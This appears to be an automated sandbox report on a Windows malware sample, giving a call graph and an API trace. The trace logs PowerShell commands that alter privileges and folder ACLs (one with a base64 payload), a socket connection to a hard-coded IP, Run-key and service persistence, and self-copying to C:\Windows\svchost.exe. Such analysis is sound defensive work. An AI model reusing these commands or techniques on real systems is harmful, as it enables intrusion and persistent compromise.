                                                                                                                    execution_graph 35174 4d10497 35179 4d100cd GetPEB 35174->35179 35176 4d104a8 35178 4d104e0 35176->35178 35181 4d101cb 35176->35181 35180 4d100e5 35179->35180 35180->35176 35182 4d101e6 35181->35182 35187 4d101df 35181->35187 35183 4d1021e VirtualAlloc 35182->35183 35182->35187 35186 4d10238 35183->35186 35183->35187 35184 4d10330 LoadLibraryA 35184->35186 35184->35187 35185 4d103a3 35185->35187 35191 624ed44 HeapCreate 35185->35191 35203 625cd41 35185->35203 35211 62470f7 35185->35211 35186->35184 35186->35185 35187->35178 35192 624ed64 35191->35192 35193 624ed9a 35191->35193 35215 624ebfc 57 API calls 35192->35215 35193->35187 35195 624ed69 35196 624ed73 35195->35196 35197 624ed80 35195->35197 35216 624ee49 HeapAlloc 35196->35216 35198 624ed9d 35197->35198 35217 624f990 5 API calls _rand 35197->35217 35198->35187 35200 624ed7d 35200->35198 35202 624ed8e HeapDestroy 35200->35202 35202->35193 35204 625cdb3 GetVersion 35203->35204 35205 625cdf4 GetProcessVersion 35204->35205 35206 625ce06 35204->35206 35205->35206 35218 625b632 10 API calls 35206->35218 35208 625ce0d 35219 625b5ee 7 API calls 35208->35219 35210 625ce17 LoadCursorA LoadCursorA 35210->35187 35212 6247103 35211->35212 35213 62470fe 35211->35213 35212->35187 35220 62467cc 9 API calls 35213->35220 35215->35195 35216->35200 35217->35200 35218->35208 35219->35210 35310 6241c74 35220->35310 35222 624682e 35223 6241c74 SetFileAttributesA 35222->35223 35224 624683c 35223->35224 35225 6241c74 SetFileAttributesA 35224->35225 35226 6246847 35225->35226 35227 6241c74 SetFileAttributesA 35226->35227 35228 6246852 35227->35228 35229 6241c74 SetFileAttributesA 35228->35229 35230 624685d 35229->35230 35231 6241c74 SetFileAttributesA 35230->35231 35232 6246868 35231->35232 35233 6241c74 SetFileAttributesA 35232->35233 35234 6246873 35233->35234 35235 6241c74 SetFileAttributesA 35234->35235 35236 624687e 35235->35236 35313 6245ce6 CreateToolhelp32Snapshot Process32First 35236->35313 35239 62468bd 35241 62468d7 35239->35241 35242 62468cb CreateThread 35239->35242 35240 6245ce6 4 API calls 35243 624689a 35240->35243 35244 62468df CreateThread 35241->35244 35245 62468eb 35241->35245 35242->35241 35528 624628e 49 API calls 35242->35528 35243->35239 35246 624689f WinExec WinExec WinExec 35243->35246 35244->35245 35443 6245e1f 35244->35443 35247 62468f3 CreateThread 35245->35247 35248 62468ff 35245->35248 35246->35239 35247->35248 35529 6245d5b 7 API calls 35247->35529 35249 6246907 CreateThread 35248->35249 35250 6246913 35248->35250 35249->35250 35527 6246313 35249->35527 35251 624694b 35250->35251 35252 624691b CreateThread CreateThread CreateThread CreateThread 35250->35252 35253 6245ce6 4 API calls 35251->35253 35292 62469ee 35251->35292 35252->35251 35479 6246587 35252->35479 35515 6246780 SetThreadExecutionState SetThreadExecutionState 35252->35515 35520 6241b6d Sleep 35252->35520 35523 624650a 35252->35523 35256 6246961 35253->35256 35254 62469ff 35255 6246a02 6 API calls 35254->35255 35261 6246c59 ExitProcess 35254->35261 35263 6246a6d _rand 35254->35263 35255->35254 35255->35263 35258 6246966 35256->35258 35259 6246993 35256->35259 35257 6246b58 35319 624838b 35257->35319 35333 624a1c0 GetFileAttributesA 35258->35333 35265 6245ce6 4 API calls 35259->35265 35263->35257 35267 6246a90 InternetOpenA 35263->35267 35264 6246b62 35268 6246b6d GetModuleFileNameA 35264->35268 35294 6246ba8 35264->35294 35269 624699d 35265->35269 35266 6246971 35271 6246989 35266->35271 35279 6248d1a 46 API calls 35266->35279 35267->35263 35272 6246ab0 35267->35272 35273 6246b91 35268->35273 35274 62469d2 35269->35274 35276 624a1c0 37 API calls 35269->35276 35270 6246c99 35275 6246d67 35270->35275 35325 624571e CreateMutexA GetLastError 35270->35325 35284 6245ce6 4 API calls 35271->35284 35342 624a34b 48 API calls 35272->35342 35273->35294 35322 6248d1a CreateEventA 35273->35322 35286 6248d1a 46 API calls 35274->35286 35274->35292 35275->35212 35288 62469ad 35276->35288 35277 6246bc4 GetModuleFileNameA CopyFileA RegOpenKeyExA 35282 6246c4a 35277->35282 35283 6246c2a RegSetValueExA RegCloseKey 35277->35283 35278 6246c60 35278->35275 35343 624708c RegOpenKeyExA _rand 35278->35343 35279->35271 35289 624571e 52 API calls 35282->35289 35283->35282 35284->35274 35285 6246ac2 InternetOpenUrlA 35285->35263 35291 6246ae4 InternetReadFile 35285->35291 35286->35292 35288->35271 35295 6248d1a 46 API calls 35288->35295 35296 6246c4f Sleep 35289->35296 35291->35291 35306 6246afe _rand 35291->35306 35292->35254 35292->35263 35294->35270 35294->35277 35294->35278 35295->35271 35296->35282 35297 6246c72 35298 6246cb5 GetModuleFileNameA CopyFileA 35297->35298 35299 6246c76 StartServiceCtrlDispatcherA 35297->35299 35344 6245643 15 API calls _rand 35298->35344 35301 624571e 52 API calls 35299->35301 35301->35270 35302 6246d3a 35345 6246d6c 40 API calls _rand 35302->35345 35303 6246b39 InternetCloseHandle InternetCloseHandle 35303->35263 35305 6246d4e Sleep 35307 624571e 52 API calls 35305->35307 35306->35303 35308 6246d61 35307->35308 35346 624ab9b 32 API calls 35308->35346 35311 6241c7b SetFileAttributesA 35310->35311 35311->35222 35314 6245d57 35313->35314 35315 6245d18 Process32Next 35313->35315 35314->35239 35314->35240 35316 6245d33 35315->35316 35317 6245d4e CloseHandle 35315->35317 35316->35315 35318 6245d48 35316->35318 35317->35314 35318->35317 35320 6248394 35319->35320 35321 6248398 71 API calls 35319->35321 35320->35264 35321->35264 35347 624b39d 35322->35347 35326 624573e CloseHandle 35325->35326 35327 6245749 35325->35327 35328 624578f Sleep 35326->35328 35329 6248d1a 46 API calls 35327->35329 35328->35270 35330 6245759 Sleep 35329->35330 35331 6248d1a 46 API calls 35330->35331 35332 6245777 WaitForSingleObject CloseHandle 35331->35332 35332->35328 35334 624a1e0 35333->35334 35335 624a1cf GetLastError 35333->35335 35337 624a203 35334->35337 35441 624de55 35 API calls _rand 35334->35441 35440 624dde2 35 API calls ctype 35335->35440 35337->35266 35338 624a1db 35338->35266 35340 624a1f0 35442 624de5e 35 API calls _rand 35340->35442 35342->35285 35343->35297 35344->35302 35345->35305 35346->35275 35357 625005d 35347->35357 35349 624b3ad _rand 35350 624b3f0 35349->35350 35352 624b3bb CreateThread 35349->35352 35368 624b2b4 29 API calls ctype 35350->35368 35353 6248d56 WaitForSingleObject CloseHandle 35352->35353 35355 624b3e8 GetLastError 35352->35355 35376 624b408 TlsGetValue 35352->35376 35353->35294 35354 624b3f6 35354->35353 35369 624dde2 35 API calls ctype 35354->35369 35355->35350 35367 6250092 _rand 35357->35367 35358 6250178 35358->35349 35359 625014a HeapAlloc 35359->35367 35366 625010c 35366->35359 35366->35367 35373 624cff4 29 API calls 2 library calls 35366->35373 35374 624fc88 6 API calls _rand 35366->35374 35375 625017f LeaveCriticalSection ctype 35366->35375 35367->35358 35367->35359 35367->35366 35370 624cff4 29 API calls 2 library calls 35367->35370 35371 624f1e5 5 API calls _rand 35367->35371 35372 62500f6 LeaveCriticalSection ctype 35367->35372 35368->35354 35369->35353 35370->35367 35371->35367 35372->35367 35373->35366 35374->35366 35375->35366 35377 624b440 35376->35377 35378 624b455 TlsSetValue 35376->35378 35396 624ce08 35377->35396 35381 624b474 GetCurrentThreadId 35378->35381 35382 624b46c 35378->35382 35384 624b485 35381->35384 35418 624b742 7 API calls _rand 35382->35418 35388 624b4ce 35384->35388 35385 624b473 35385->35381 35389 624b4d7 35388->35389 35419 624cda1 GetLastError TlsGetValue 35389->35419 35391 624b4df 35392 624b4ec 35391->35392 35430 624b742 7 API calls _rand 35391->35430 35394 624ce08 31 API calls 35392->35394 35395 624b4f3 ExitThread 35394->35395 35397 624ce16 35396->35397 35398 624cea7 35396->35398 35399 624ce2c 35397->35399 35400 624ce1f TlsGetValue 35397->35400 35398->35378 35402 624ce39 35399->35402 35432 624b2b4 29 API calls ctype 35399->35432 35400->35399 35401 624ce98 TlsSetValue 35400->35401 35401->35398 35404 624ce47 35402->35404 35433 624b2b4 29 API calls ctype 35402->35433 35406 624ce55 35404->35406 35434 624b2b4 29 API calls ctype 35404->35434 35408 624ce63 35406->35408 35435 624b2b4 29 API calls ctype 35406->35435 35409 624ce71 35408->35409 35436 624b2b4 29 API calls ctype 35408->35436 35412 624ce7f 35409->35412 35437 624b2b4 29 API calls ctype 35409->35437 35414 624ce90 35412->35414 35438 624b2b4 29 API calls ctype 35412->35438 35439 624b2b4 29 API calls ctype 35414->35439 35417 624ce97 35417->35401 35418->35385 35420 624cdfc SetLastError 35419->35420 35421 624cdbd 35419->35421 35420->35391 35422 625005d _rand 30 API calls 35421->35422 35423 624cdc6 35422->35423 35424 624cdf4 35423->35424 35425 624cdce TlsSetValue 35423->35425 35431 624b742 7 API calls _rand 35424->35431 35425->35424 35426 624cddf _rand 35425->35426 35429 624cde5 GetCurrentThreadId 35426->35429 35428 624cdfb 35428->35420 35429->35420 35430->35392 35431->35428 35432->35402 35433->35404 35434->35406 35435->35408 35436->35409 35437->35412 35438->35414 35439->35417 35440->35338 35441->35340 35442->35338 35445 6245e3b 35443->35445 35444 6245ce6 CreateToolhelp32Snapshot Process32First Process32Next CloseHandle 35444->35445 35445->35444 35446 6245e4e RegOpenKeyExA 35445->35446 35450 6245f34 RegOpenKeyExA 35445->35450 35451 6245fe1 RegOpenKeyExA 35445->35451 35455 6247b7d 47 API calls 35445->35455 35459 624627e Sleep 35445->35459 35460 6247109 30 API calls 35445->35460 35462 6255967 30 API calls 35445->35462 35470 6245eb3 35445->35470 35530 6245da7 FindWindowA 35445->35530 35545 6247ac4 CreateFileA WriteFile 35445->35545 35548 6241f38 RegOpenKeyExA 35445->35548 35446->35445 35447 6245e8c 35446->35447 35448 6245da7 50 API calls 35447->35448 35449 6245e96 Sleep FindWindowA 35448->35449 35449->35470 35450->35445 35452 6245f6f 35450->35452 35451->35445 35453 6245da7 50 API calls 35452->35453 35456 6245f79 Sleep FindWindowA 35453->35456 35455->35445 35456->35470 35458 6247b7d 47 API calls 35458->35470 35459->35445 35460->35445 35462->35445 35463 6247ac4 3 API calls 35464 6245f03 Sleep WinExec 35463->35464 35464->35459 35467 6246098 Sleep WinExec 35467->35445 35468 6245da7 50 API calls 35469 62460da Sleep FindWindowA 35468->35469 35469->35470 35470->35445 35470->35458 35470->35463 35470->35468 35471 6247109 30 API calls 35470->35471 35472 6255967 30 API calls 35470->35472 35551 6255967 35470->35551 35471->35470 35473 624613d RegOpenKeyExA GetModuleFileNameA 35472->35473 35476 624a2d0 _rand 35473->35476 35474 624616b RegSetValueExA RegCloseKey RegOpenKeyExA GetModuleFileNameA 35474->35476 35475 62461bc RegSetValueExA RegCloseKey RegOpenKeyExA GetModuleFileNameA 35475->35476 35476->35474 35476->35475 35477 624620d RegSetValueExA RegCloseKey RegOpenKeyExA GetModuleFileNameA 35476->35477 35478 624625e RegSetValueExA RegCloseKey 35476->35478 35477->35476 35478->35459 35480 624659c GetModuleFileNameA 35479->35480 35481 62465c3 _rand 35480->35481 35482 62465e4 CreateDirectoryA 35481->35482 35483 624666e GetFileAttributesA 35482->35483 35490 624660a 35482->35490 35484 6246682 CopyFileA 35483->35484 35498 6246703 35483->35498 35487 624674f 35484->35487 35496 624669a 35484->35496 35485 6247b7d 47 API calls 35485->35490 35486 6245ce6 CreateToolhelp32Snapshot Process32First Process32Next CloseHandle 35486->35498 35488 6247b7d 47 API calls 35487->35488 35491 624675e 35488->35491 35489 6247b7d 47 API calls 35489->35496 35490->35485 35494 6247109 30 API calls 35490->35494 35500 6255967 30 API calls 35490->35500 35495 6247109 30 API calls 35491->35495 35492 624673f Sleep 35492->35480 35493 6247109 30 API calls 35493->35496 35494->35490 35497 624676b 35495->35497 35496->35489 35496->35493 35499 6255967 30 API calls 35496->35499 35501 6255967 30 API calls 35497->35501 35498->35486 35498->35492 35502 624a1c0 37 API calls 35498->35502 35508 6246733 WinExec 35498->35508 35503 62466b9 CopyFileA CopyFileA Sleep 35499->35503 35504 6246636 SetFileAttributesA 35500->35504 35505 6246772 35501->35505 35502->35498 35506 6241c74 SetFileAttributesA 35503->35506 35507 6247b7d 47 API calls 35504->35507 35513 62466ee 35506->35513 35509 624664e 35507->35509 35508->35492 35511 6247109 30 API calls 35509->35511 35512 6255967 30 API calls 35509->35512 35510 6241c74 SetFileAttributesA 35510->35513 35511->35509 35514 6246662 WinExec 35512->35514 35513->35498 35513->35510 35514->35483 35516 6246797 SetThreadExecutionState 35515->35516 35517 624679e 35515->35517 35516->35517 35518 62467a9 Sleep OutputDebugStringA 35517->35518 35518->35518 35519 62467be OutputDebugStringA 35518->35519 35619 6241b34 GetModuleHandleA GetProcAddress 35520->35619 35524 624651b 13 API calls 35523->35524 35525 624656f SendMessageA 35524->35525 35526 624657a Sleep 35524->35526 35525->35526 35526->35524 35531 6245dbd 35530->35531 35532 6245df8 35530->35532 35533 6247b7d 47 API calls 35531->35533 35555 6247b7d 35532->35555 35536 6245dcc 35533->35536 35565 6247109 35536->35565 35537 6247109 30 API calls 35539 6245e14 35537->35539 35541 6255967 30 API calls 35539->35541 35543 6245e1b Sleep FindWindowA 35541->35543 35542 6255967 30 API calls 35544 6245de0 PostMessageA SendMessageA 35542->35544 35543->35445 35544->35543 35546 6247afc 35545->35546 35547 6247afe CloseHandle 35545->35547 35546->35547 35547->35467 35549 6241f64 RegQueryValueExA RegCloseKey 35548->35549 35550 6241f60 35548->35550 35549->35550 35550->35445 35552 625597a 35551->35552 35553 62559ac 35552->35553 35618 6256228 30 API calls 3 library calls 35552->35618 35553->35470 35556 6247b87 _rand __EH_prolog 35555->35556 35573 6247b3d 35556->35573 35558 6247bbf 35563 6247bce 35558->35563 35577 6254cde 35558->35577 35559 6247cc4 35581 6247aa2 35559->35581 35563->35559 35585 6256228 30 API calls 3 library calls 35563->35585 35566 6247113 __EH_prolog 35565->35566 35567 6247b3d 30 API calls 35566->35567 35569 624712b 35567->35569 35568 62471b1 35570 6247aa2 30 API calls 35568->35570 35569->35568 35617 6256228 30 API calls 3 library calls 35569->35617 35572 6245dd9 35570->35572 35572->35542 35574 6247b5b 35573->35574 35575 6247b4d 35573->35575 35574->35558 35575->35574 35576 6255967 30 API calls 35575->35576 35576->35574 35578 6254d4a 35577->35578 35579 6254cef ctype 35577->35579 35578->35563 35579->35578 35586 625702f 35579->35586 35583 6247aaa 35581->35583 35582 6245e07 35582->35537 35583->35582 35584 6255967 30 API calls 35583->35584 35584->35582 35585->35559 35593 624d18a 35586->35593 35588 625703b 35589 6257041 35588->35589 35599 624de67 35588->35599 35611 624d1dc LeaveCriticalSection LeaveCriticalSection ctype 35589->35611 35592 6257064 35592->35579 35594 624d197 35593->35594 35595 624d1ae EnterCriticalSection 35593->35595 35594->35595 35596 624d19e 35594->35596 35595->35588 35612 624cff4 29 API calls 2 library calls 35596->35612 35598 624d1ac 35598->35588 35600 624df01 35599->35600 35601 624de7d 35599->35601 35600->35589 35601->35600 35609 624ded8 35601->35609 35613 6251bc3 29 API calls ctype 35601->35613 35602 624dee2 35605 624def9 35602->35605 35608 624df09 35602->35608 35603 624df49 35616 62515c1 44 API calls ctype 35603->35616 35614 62515c1 44 API calls ctype 35605->35614 35608->35600 35615 6251c07 40 API calls ctype 35608->35615 35609->35602 35609->35603 35611->35592 35612->35598 35613->35609 35614->35600 35615->35600 35616->35600 35617->35568 35618->35553 35620 6241b67 RegOpenKeyExA RegSetValueExA RegSetValueExA RegSetValueExA RegCloseKey 35619->35620 35621 6241b5a GetCurrentProcess 35619->35621 35621->35620 35622 624acaf 35623 624acd8 35622->35623 35625 624acb6 _rand 35622->35625 35625->35623 35626 624acdb 35625->35626 35627 624ad08 35626->35627 35629 624ad4b 35626->35629 35633 624ad36 35627->35633 35644 624cff4 29 API calls 2 library calls 35627->35644 35632 624ad6d 35629->35632 35629->35633 35630 624ad1e 35645 624f1e5 5 API calls _rand 35630->35645 35631 624adba RtlAllocateHeap 35635 624ad3d 35631->35635 35647 624cff4 29 API calls 2 library calls 35632->35647 35633->35631 35633->35635 35635->35625 35637 624ad29 35646 624ad42 LeaveCriticalSection ctype 35637->35646 35638 624ad74 35648 624fc88 6 API calls _rand 35638->35648 35641 624ad87 35649 624ada1 LeaveCriticalSection ctype 35641->35649 35643 624ad94 35643->35633 35643->35635 35644->35630 35645->35637 35646->35633 35647->35638 35648->35641 35649->35643 35650 1d2170 Sleep CoInitializeEx 35651 1d21b6 35650->35651 35652 1d21d3 CoCreateInstance 35650->35652 35728 1d2b20 46 API calls 35651->35728 35654 1d2219 VariantInit VariantInit VariantInit VariantInit 35652->35654 35655 1d21f6 35652->35655 35660 1d22a5 VariantClear VariantClear VariantClear VariantClear 35654->35660 35730 1d2b20 46 API calls 35655->35730 35656 1d21c0 35729 1d2de0 88 API calls 5 library calls 35656->35729 35659 1d2200 35731 1d2de0 88 API calls 5 library calls 35659->35731 35663 1d22d0 35660->35663 35664 1d22e3 VariantInit VariantInit VariantInit VariantInit 35660->35664 35661 1d21c6 35744 1d5b55 5 API calls _ValidateLocalCookies 35661->35744 35732 1d2b20 46 API calls 35663->35732 35668 1d236f VariantClear VariantClear VariantClear VariantClear 35664->35668 35666 1d2206 CoUninitialize 35666->35661 35667 1d22da 35733 1d2de0 88 API calls 5 library calls 35667->35733 35672 1d2394 35668->35672 35673 1d23c0 35668->35673 35670 1d27c2 35734 1d2b20 46 API calls 35672->35734 35721 1d2060 35673->35721 35674 1d22e0 35674->35664 35677 1d239e 35735 1d2de0 88 API calls 5 library calls 35677->35735 35679 1d23a4 CoUninitialize 35679->35661 35681 1d247f 35689 1d2499 35681->35689 35701 1d24ce 35681->35701 35682 1d2453 35736 1d2b20 46 API calls 35682->35736 35684 1d23d4 35686 1d241d SysFreeString 35684->35686 35687 1d242a 35684->35687 35685 1d245d 35737 1d2de0 88 API calls 5 library calls 35685->35737 35686->35687 35687->35681 35687->35682 35738 1d2b20 46 API calls 35689->35738 35690 1d2463 CoUninitialize 35690->35661 35692 1d24a3 35739 1d2de0 88 API calls 5 library calls 35692->35739 35695 1d24a9 CoUninitialize 35695->35661 35697 1d261d SysAllocString 35698 1d27c6 _com_issue_error 35697->35698 35699 1d2643 VariantInit VariantInit 35697->35699 35702 1d27d0 MessageBoxA 35698->35702 35700 1d2060 52 API calls 35699->35700 35707 1d268e 35700->35707 35701->35697 35703 1d2060 52 API calls 35701->35703 35716 1d2594 35703->35716 35704 1d2732 VariantClear VariantClear VariantClear 35705 1d2775 35704->35705 35706 1d2757 35704->35706 35742 1d2b20 46 API calls 35705->35742 35740 1d2b20 46 API calls 35706->35740 35707->35704 35710 1d26fc SysFreeString 35707->35710 35711 1d2709 35707->35711 35710->35711 35711->35704 35712 1d277f 35743 1d2de0 88 API calls 5 library calls 35712->35743 35713 1d2761 35741 1d2de0 88 API calls 5 library calls 35713->35741 35718 1d25e0 35716->35718 35719 1d25d3 SysFreeString 35716->35719 35717 1d2767 CoUninitialize 35717->35661 35718->35697 35719->35718 35745 1d5b68 35721->35745 35723 1d208e 35725 1d20c5 _com_issue_error 35723->35725 35759 1d5880 25 API calls 5 library calls 35723->35759 35726 1d20d8 35725->35726 35727 1d211f SysFreeString 35725->35727 35726->35684 35727->35726 35728->35656 35729->35661 35730->35659 35731->35666 35732->35667 35733->35674 35734->35677 35735->35679 35736->35685 35737->35690 35738->35692 35739->35695 35740->35713 35741->35717 35742->35712 35743->35717 35744->35670 35747 1d5b6d 35745->35747 35748 1d5b87 35747->35748 35750 1d5b89 35747->35750 35760 1dab4a 35747->35760 35769 1dd045 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 35747->35769 35748->35723 35751 1d11e0 Concurrency::cancel_current_task 35750->35751 35752 1d5b93 std::_Facet_Register 35750->35752 35767 1d6f34 RaiseException 35751->35767 35770 1d6f34 RaiseException 35752->35770 35754 1d11fc 35768 1d6cd1 41 API calls 3 library calls 35754->35768 35757 1d655e GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 35757->35723 35758 1d1223 35758->35723 35759->35725 35766 1e0109 __Getctype 35760->35766 35761 1e0147 35772 1dc9b8 14 API calls ___free_lconv_mon 35761->35772 35763 1e0132 RtlAllocateHeap 35764 1e0145 35763->35764 35763->35766 35764->35747 35766->35761 35766->35763 35771 1dd045 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 35766->35771 35767->35754 35768->35758 35769->35747 35770->35757 35771->35766 35772->35764

                                                                                                                    Executed Functions

                                                                                                                    Function 062467CC Relevance: 131.7, APIs: 44, Strings: 31, Instructions: 466filethreadnetworkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 62467cc-624688e SetThreadExecutionState DeleteFileA * 8 call 6241c74 * 8 call 6245ce6 19 6246890-624689d call 6245ce6 0->19 20 62468bd-62468c9 0->20 19->20 27 624689f-62468bb WinExec * 3 19->27 22 62468d7-62468dd 20->22 23 62468cb-62468d5 CreateThread 20->23 25 62468df-62468e9 CreateThread 22->25 26 62468eb-62468f1 22->26 23->22 25->26 28 62468f3-62468fd CreateThread 26->28 29 62468ff-6246905 26->29 27->20 28->29 30 6246907-6246911 CreateThread 29->30 31 6246913-6246919 29->31 30->31 32 624694b-6246951 31->32 33 624691b-6246949 CreateThread * 4 31->33 34 6246957-6246964 call 6245ce6 32->34 35 62469f1-62469fd 32->35 33->32 44 6246966-624697b call 624a1c0 34->44 45 6246993-62469a0 call 6245ce6 34->45 37 6246a6d-6246a74 35->37 38 62469ff 35->38 41 6246b58-6246b6b call 624838b 37->41 42 6246a7a-6246a7d 37->42 39 6246a02-6246a58 WSAStartup socket GetCurrentThreadId htons inet_addr connect 38->39 39->37 43 6246a5a-6246a61 39->43 56 6246b6d-6246b95 GetModuleFileNameA call 624a870 41->56 57 6246bab-6246bb1 41->57 46 6246a82-6246aaa call 6249e70 InternetOpenA 42->46 48 6246a67-6246a6b 43->48 49 6246c59-6246c5a ExitProcess 43->49 61 624698c-6246991 44->61 62 624697d-6246989 call 6248d1a 44->62 66 62469a2-62469b7 call 624a1c0 45->66 67 62469de-62469e2 45->67 63 6246ab0-6246ae2 call 624a34b InternetOpenUrlA 46->63 64 6246b4b-6246b52 46->64 48->37 48->39 56->57 87 6246b97-6246ba3 call 6248d1a 56->87 59 6246bb7-6246bbe 57->59 60 6246c99-6246ca0 57->60 71 6246bc4-6246c28 GetModuleFileNameA CopyFileA RegOpenKeyExA 59->71 72 6246c60-6246c67 59->72 68 6246ca6-6246cb3 call 624571e Sleep 60->68 69 6246d67-6246d6b 60->69 76 62469cd-62469d5 call 6245ce6 61->76 62->61 63->64 94 6246ae4-6246afc InternetReadFile 63->94 64->41 64->46 89 62469c8 66->89 90 62469b9-62469c5 call 6248d1a 66->90 75 62469e7-62469ee call 6248d1a 67->75 80 6246c4a-6246c57 call 624571e Sleep 71->80 81 6246c2a-6246c44 RegSetValueExA RegCloseKey 71->81 72->69 83 6246c6d-6246c74 call 624708c 72->83 75->35 76->35 100 62469d7-62469dc 76->100 81->80 104 6246cb5-6246d62 GetModuleFileNameA CopyFileA call 6245643 call 6246d6c Sleep call 624571e call 624ab9b 83->104 105 6246c76-6246c94 StartServiceCtrlDispatcherA call 624571e 83->105 97 6246ba8 87->97 89->76 90->89 94->94 102 6246afe-6246b0e call 624a2d0 94->102 97->57 100->75 111 6246b10-6246b21 call 624a210 102->111 112 6246b39-6246b45 InternetCloseHandle * 2 102->112 104->69 105->60 117 6246b32 111->117 118 6246b23-6246b31 call 624a0d0 111->118 112->64 117->112 118->117
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(80000003), ref: 062467DD
                                                                                                                    • DeleteFileA.KERNEL32(C:\del), ref: 062467EE
                                                                                                                    • DeleteFileA.KERNEL32(C:\tzfz), ref: 062467F5
                                                                                                                    • DeleteFileA.KERNEL32(C:\1.ini), ref: 062467FC
                                                                                                                    • DeleteFileA.KERNEL32(C:\2.ini), ref: 06246803
                                                                                                                    • DeleteFileA.KERNEL32(C:\inst.ini), ref: 0624680A
                                                                                                                    • DeleteFileA.KERNEL32(C:\odbc.ini), ref: 06246811
                                                                                                                    • DeleteFileA.KERNEL32(C:\odbc.inst.ini), ref: 06246818
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log), ref: 0624681F
                                                                                                                      • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
                                                                                                                      • Part of subcall function 06245CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06245CF6
                                                                                                                      • Part of subcall function 06245CE6: Process32First.KERNEL32(00000000,?), ref: 06245D0F
                                                                                                                      • Part of subcall function 06245CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06245D2A
                                                                                                                      • Part of subcall function 06245CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06245D4F
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 062468AB
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 062468B3
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 062468BB
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0624628E,00000000,00000000,00000000), ref: 062468D5
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06245E1F,00000000,00000000,00000000), ref: 062468E9
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06245D5B,00000000,00000000,00000000), ref: 062468FD
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06246313,00000000,00000000,00000000), ref: 06246911
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0624650A,00000000,00000000,00000000), ref: 06246925
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06246780,00000000,00000000,00000000), ref: 06246931
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06241B6D,00000000,00000000,00000000), ref: 0624693D
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06246587,00000000,00000000,00000000), ref: 06246949
                                                                                                                    • WSAStartup.WS2_32(00000002,?), ref: 06246A11
                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 06246A1C
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 06246A2B
                                                                                                                    • htons.WS2_32(00006365), ref: 06246A32
                                                                                                                    • inet_addr.WS2_32(202.79.169.178), ref: 06246A3D
                                                                                                                    • connect.WS2_32(?,00000002,00000010), ref: 06246A4F
                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 06246A9F
                                                                                                                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000100,00000000), ref: 06246AD7
                                                                                                                    • InternetReadFile.WININET(?,?,00000824,?), ref: 06246AF3
                                                                                                                    • InternetCloseHandle.WININET(?), ref: 06246B3C
                                                                                                                    • InternetCloseHandle.WININET(?), ref: 06246B45
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06246B7A
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06246BF4
                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 06246C06
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 06246C20
                                                                                                                    • RegSetValueExA.ADVAPI32(?,06272BD8,00000000,00000001,?,00000018), ref: 06246C3B
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06246C44
                                                                                                                    • Sleep.KERNEL32(0000003C), ref: 06246C51
                                                                                                                    • ExitProcess.KERNEL32 ref: 06246C5A
                                                                                                                    • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 06246C8E
                                                                                                                    • Sleep.KERNEL32(0000003C), ref: 06246CAD
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 06246D1D
                                                                                                                    • CopyFileA.KERNEL32(?,C:\Windows\svchost.exe,00000000), ref: 06246D2F
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06246D56
                                                                                                                    Strings
                                                                                                                    • Cdefgh Jklmnopq Stuvwxya Cdef, xrefs: 06246D3F
